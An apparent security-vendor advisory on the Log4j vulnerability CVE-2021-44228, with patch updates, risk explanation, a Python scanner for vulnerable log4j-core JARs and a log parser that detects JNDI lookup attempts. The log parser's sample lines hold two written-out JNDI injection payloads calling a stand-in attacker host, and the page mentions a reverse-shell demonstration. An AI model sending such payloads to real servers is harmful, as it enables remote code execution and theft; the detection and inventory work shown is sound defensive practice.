Update (Dec 29th 2021 - 02:20 UTC): A new vulnerability of moderate severity was identified and assigned CVE-2021-44832. Apache has released v2.17.1 to mitigate it. The bug requires the attacker to control the Log4j configuration to have any effect. If, as part of mitigation, you have removed the JNDI class altogether from your log4j JARs, you are already protected.
Update (Dec 14th 2021 - 07:58 UTC): Per the Elasticsearch announcement (ESA-2021-31), Elasticsearch 5 is susceptible to both RCE and information leak via DNS. For versions 5.6.11 - 5.6.16 the vulnerability can be mitigated by setting the -Dlog4j2.formatMsgNoLookups=true JVM option in the JAVA_TOOL_OPTIONS environment variable or by setting the system property
Update (Dec 14th 2021 - 06:00 UTC): You can download a short one-pager to share with your customers, internal teams and other stakeholders using this link.
Apache Log4j is an open-source Java package. It is the most widely used default logging package. Affected users include Apple iCloud, AWS, Google, Cloudflare, most of the financial services world, among others.
What can go wrong?
Many things can go wrong. Attackers may execute their own code on your server, remotely over the network, without any authentication. Even if they cannot run code, they can scoop up secrets held in the server's memory.
https://xkcd.com/2347/
Why should you care?
1. Log4j is one of the most widely used components for Java and JVM-based applications.
2. Log4j may be used directly in your code or pulled in by another component, so there is no easy way to tell whether you are using it in production.
3. If it is being used, attacking it requires only a single HTTP request. This is why it is rated at the maximum severity of 10.
4. Are you absolutely sure your organization doesn't use Java/JVM? This includes applications as well as system libraries.
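Point 2 above is the hard part: Log4j usually arrives as a transitive dependency, buried in a WAR or a fat JAR. The scanner below is an added example, not code from the original page or from Kloudle, that walks a directory, opens every JAR/WAR/EAR (including archives nested inside archives), reads log4j-core's own pom.properties to get the version, and checks whether the JndiLookup class is still present. The fixed-version threshold of 2.17.1 is taken from the Dec 29th update above and is an assumption you may adjust; the sample JARs it builds are constructed stand-ins, not real Apache artefacts.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Assumption (from the Dec 29th update): 2.17.1 closes the last of the Log4j 2
# lookup bugs, so any log4j-core older than this is flagged for upgrade.
FIXED_VERSION = (2, 17, 1)
# Archive entries that identify log4j-core and its JNDI lookup class.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text):
    """Turn '2.14.1' or '2.17.1-SNAPSHOT' into a comparable tuple of ints."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        return None
    return tuple(int(g) if g else 0 for g in m.groups())


def _inspect_zip(zf, label):
    """Inspect one open archive and recurse into archives nested inside it."""
    names = set(zf.namelist())
    findings = []
    if POM_PROPS in names:
        version = None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1])
        has_jndi = JNDI_CLASS in names
        outdated = version is None or version < FIXED_VERSION
        findings.append({
            "path": label,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # only an old JAR that still ships the lookup class needs action
            "action_required": outdated and has_jndi,
        })
    for name in sorted(names):  # WAR/EAR lib directories, fat JARs
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            findings.extend(_inspect_zip(inner, f"{label}!{name}"))
    return findings


def scan_directory(root):
    """Walk `root` and return one finding per log4j-core found, nested ones included."""
    root = Path(root)
    findings = []
    for archive in sorted(root.rglob("*")):
        if archive.is_file() and archive.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(archive) as zf:
                    findings.extend(_inspect_zip(zf, archive.relative_to(root).as_posix()))
            except zipfile.BadZipFile:
                continue
    return findings


def make_sample_jar(path, version, include_jndi):
    """Write a constructed stand-in for log4j-core (demo data, not a real Apache artefact)."""
    path = Path(path)
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not bytecode


def build_demo(root):
    """Lay out three sample JARs plus a WAR that bundles the old one."""
    root = Path(root)
    make_sample_jar(root / "old" / "log4j-core-2.14.1.jar", "2.14.1", include_jndi=True)
    make_sample_jar(root / "new" / "log4j-core-2.17.1.jar", "2.17.1", include_jndi=True)
    make_sample_jar(root / "stripped" / "log4j-core-2.14.1.jar", "2.14.1", include_jndi=False)
    with zipfile.ZipFile(root / "app.war", "w") as zf:
        zf.write(root / "old" / "log4j-core-2.14.1.jar", "WEB-INF/lib/log4j-core-2.14.1.jar")


def demo():
    """Build the sample tree in a temp dir, scan it, and map each finding to its verdict."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo(tmp)
        return {f["path"]: f["action_required"] for f in scan_directory(tmp)}


if __name__ == "__main__":
    for path, needs_action in demo().items():
        print(("ACTION REQUIRED  " if needs_action else "ok               ") + path)
```

Run it against a real tree with scan_directory("/opt/myapp") and review every finding, not just the flagged ones: a 2.17.1 JAR still contains JndiLookup.class, which is why the verdict combines version and class presence. The scan relies on log4j-core's pom.properties, so a shaded or repackaged copy that dropped that file will be missed; in that case search for the JndiLookup class entry directly.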
You have convinced me, what do I do next?
1. Ask your SaaS vendors whether they are impacted and what they are doing about it.
2. Talk to team leads/developers about whether they use any software that requires Java to be installed.
3. Read updates from your cloud service providers on how they are patching and whether there is something you need to do.
4. Share this one-pager with everyone who should understand the gravity of the current situation.
5. Talk to riyaz@kloudle.com if you want to see a demonstration of how simple it is to attack and steal data.
CVE-2021-44228 log4j Exploitation in Action
A demonstration of a reverse shell on AWS obtained by exploiting the CVE-2021-44228 (Log4j 2 RCE) vulnerability.
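The defender's counterpart to the demonstration above is knowing whether anyone has sent that "simple HTTP request" at your systems. The snippet below is an added example, not code from the original page or from Kloudle: it parses web-server access logs in the Combined Log Format and flags requests whose path, referer or user-agent carries the Log4j 2 lookup prefix that CVE-2021-44228 abuses. The log lines are constructed (RFC 5737 documentation addresses and a placeholder hostname); the field names and the choice of which fields to scan are assumptions.

```python
import re
from collections import Counter

# Apache/nginx Combined Log Format:
# ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The Log4j 2 lookup prefix abused by CVE-2021-44228, matched case-insensitively.
LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Request fields an application is likely to hand to its logger verbatim (assumption).
SCANNED_FIELDS = ("request", "referer", "agent")

# Constructed sample lines; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2021:14:02:20 +0000] "GET / HTTP/1.1" 200 1043 "-" "${JNDI:ldap://attacker.example/x}"
198.51.100.4 - - [10/Dec/2021:14:02:25 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"
"""


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_lookup_attempts(text):
    """Scan a whole log text; one hit per (line, field) that carries the lookup prefix."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line: route these to a separate queue in a real pipeline
        for field in SCANNED_FIELDS:
            if LOOKUP_RE.search(rec[field]):
                hits.append({"line": lineno, "ip": rec["ip"], "field": field, "value": rec[field]})
    return hits


def sources(hits):
    """Count attempts per client address, for blocking or further triage."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_lookup_attempts(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']}: {h['ip']} via {h['field']}: {h['value']}")
    print("attempts per source:", dict(sources(found)))
```

A hit means an attempt reached the server, not that it succeeded; pair this with the JAR inventory to know whether the receiving application was actually running a vulnerable log4j-core. The match is a literal prefix check and deliberately simple, so treat a clean result as absence of the obvious pattern rather than proof that nothing happened.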
ABOUT THE AUTHOR
Akash Mahajan
Akash helps CTOs & SREs with security monitoring of their cloud-native stack | CKA, OSCP | Author - Security Automation using Ansible, Burp Suite Essentials. An accomplished security professional with over a decade's experience of providing specialist application and infrastructure advice at the highest levels to companies, governments, and organisations around the world. Now busy building an easy-to-use security platform to help CTOs & SREs with a Consolidated Security View of their cloud accounts for security compliance and operational security. Conference speaker and trainer at BlackHat US, All Day DevOps (twice), DevOps Enterprise Summit, OWASP, and NullCon. Specialties: Cloud Security - AWS, Azure, GCP, IBM, Kubernetes; Container Security; Cloud-Native Security; Building security automation products. Certifications: CKA, OSCP. Author of two security books now used as the go-to reference by the product creators: Security Automation using Ansible, Burp Suite Essentials.